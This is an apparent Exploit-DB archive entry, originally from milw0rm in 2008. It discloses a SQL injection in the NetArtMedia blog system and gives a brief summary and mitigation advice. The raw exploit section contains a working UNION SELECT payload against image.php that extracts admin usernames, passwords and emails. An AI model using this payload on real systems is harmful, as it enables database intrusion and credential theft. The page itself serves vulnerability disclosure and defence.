NetArtMedia blog system Remote SQL Injection Vulnerability

vendor:

NetArtMedia blog system

by:

Snakespc

7.5

CVSS

HIGH

Remote SQL Injection

CWE

Product Name: NetArtMedia blog system

Affected Version From:

Affected Version To:

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

NetArtMedia blog system Remote SQL Injection Vulnerability

The NetArtMedia blog system is vulnerable to a remote SQL injection attack. An attacker can exploit this vulnerability by injecting malicious SQL queries into the application's input fields, which can lead to unauthorized access to the database and potential data leakage. This vulnerability can be exploited using the Firefox browser.

Mitigation:

The vendor should release a patch or update to fix the SQL injection vulnerability. In the meantime, users are advised to avoid using the affected application or to apply proper input validation and sanitization techniques to prevent SQL injection attacks.

Source

Exploit-DB raw data:

==================================================================================================================
          SSSSS  NN    N      AA      K   K  EEEEE  SSSSS        TTTTTTTTT EEEEE     AA     MM     MM
          S      N N   N     A  A     K  K   E      S                T     E        A  A    M M   M M
          SSSSS  N  N  N    AAAAAA    KKK    EEEEE  SSSSS            T     EEEEE   AAAAAA   M  M M  M
              S  N   N N   A      A   K  K   E          S            T     E      A      A  M   M   M
          SSSSS  N    NN  A        A  K   K  EEEEE  SSSSS            T     EEEEE A        A M       M
===================================================SNAKES TEAM====================================================
                                                                                       
                             Script: NetArtMedia blog system Remote SQL Injection Vulnerability                                   
                                                                                                              
==============================================:::ALGERIAN HaCkEr:::===============================================
                =        =                                                                =          =
                =      =                Discovered By: Snakespc  :::ALGERIAN HaCkEr:::         =     =   
                =                                                                                    =
                =    =    ************ ::::::home : www.snakespc.com/sc::::::***************     =   =
                =                                                                                    =
                =       =                 :::::Mail: snakespc@gmail.com:::::::             =         =
                =                                                                                    =
                =           Sript : http://www.netartmedia.net/blogsystem/                 =
                =                               www.netartmedia.net                                  =              
                 =================================== Snakespc ======================================    


[*]Exploit:
Using FireFox
view-source:http://localhost/[script_path]/image.php?id=-1 UNION SELECT 1,2,concat_ws(0x3e,username,password,email),4,5,6,7 FROM websiteadmin_admin_users--
                                                                   
===================================================================================================================
Mr.HCOCA_MAN:::DrEaDFuL:::yassine_enp:::Super Cristal:::His0k4:::sunhouse2:::aSSaSSin_HaCkErS:::THE INJECTOR:::ALMADJHOOL:::so9or::
ALL www.Snakespc.com/sc >>>> Members 
str0ke.....>>>>.....milw0rm
===================================================================================================================

# milw0rm.com [2008-11-23]